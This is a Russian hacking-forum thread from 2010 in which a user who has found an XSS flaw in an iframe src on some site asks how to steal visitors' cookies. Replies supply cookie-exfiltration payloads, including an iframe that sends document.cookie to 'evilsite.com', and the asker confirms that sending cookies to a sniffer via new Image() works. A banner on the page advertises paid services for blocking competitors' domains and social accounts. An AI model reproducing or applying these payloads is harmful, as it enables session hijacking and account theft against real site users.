Форум АНТИЧАТ - XSS в IFRAME SRC. Как взять куки?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
XSS в IFRAME SRC. Как взять куки?

Опции темы

Поиск в этой теме

Опции просмотра

XSS в IFRAME SRC. Как взять куки?

18.05.2010, 17:31

TomskDiver

Новичок

Регистрация: 24.04.2008

Сообщений: 8

Провел на форуме:
19485

Репутация: 0

XSS в IFRAME SRC. Как взять куки?

Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript:alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал

Можно ли как-то красть куки через данную уязвимость?

18.05.2010, 18:27

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

Провел на форуме:
2212846

Репутация: 56

Цитата:

Сообщение от TomskDiver

Можно ли как-то красть куки через данную уязвимость?

Последний раз редактировалось Redwood; 18.05.2010 в 18:46..

18.05.2010, 18:35

TomskDiver

Новичок

Регистрация: 24.04.2008

Сообщений: 8

Провел на форуме:
19485

Репутация: 0

Цитата:

Сообщение от Redwood

Как мне кажется у вас ошибка.
если после php оставить = то ничего не выводится.
если после php поставить например ?c= то выводится: c='+document.cookie+'

В src разве сработает document.cookie? Ведь надо писать что-то типа src="Javascript:blablabla document.cookie "

18.05.2010, 18:38

IndigoMan

Новичок

Регистрация: 07.06.2008

Сообщений: 8

Провел на форуме:
35514

Репутация: 0

scr параметр зависим от твоих входных данных? если нет, то ты просто модифицировал код html и все...это даже не уязвимость получается.

18.05.2010, 18:49

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

Провел на форуме:
2212846

Репутация: 56

Цитата:

Сообщение от TomskDiver

В src разве сработает document.cookie? Ведь надо писать что-то типа src="javascript:blablabla document.cookie "

Сработает

Последний раз редактировалось Redwood; 19.05.2010 в 14:08..

18.05.2010, 18:55

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

Провел на форуме:
2485155

Репутация: 719

Отправить сообщение для satana-fu с помощью ICQ

Цитата:

попробуй так

18.05.2010, 19:10

IndigoMan

Новичок

Регистрация: 07.06.2008

Сообщений: 8

Провел на форуме:
35514

Репутация: 0

и так работает
<iframe src="http://www.evilsite.com/?cookie=" + document. cookie style="display:none;"></iframe>

19.05.2010, 07:27

TomskDiver

Новичок

Регистрация: 24.04.2008

Сообщений: 8

Провел на форуме:
19485

Репутация: 0

Redwood, IndigoMan - то как вы предложили не работает. Снифер будет выводить слова document. cookie, а не сами куки.
satana-fu - РЕСПЕКТ! Получилось. В дополнительном js файле делаю new Image() c src на снифер и всё работает.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Большой архив статей по раскрутке и оптимизации сайтов	_-Ramos-_	Статьи	12	13.06.2010 23:56
Халявный Интернет (для маленьких)	stopxaker	Статьи	91	20.04.2010 19:52
Халявный интернет или как спрятаться надежнее чем VPN или SSH с цепочкой соксов.	kodzero	Статьи	16	16.11.2009 20:23
FAQ. Перед тем как задать вопрос.	Fata1ex	ICQ	1	04.11.2007 20:35
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал	Дрэгги	Болталка	21	22.07.2007 12:33

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход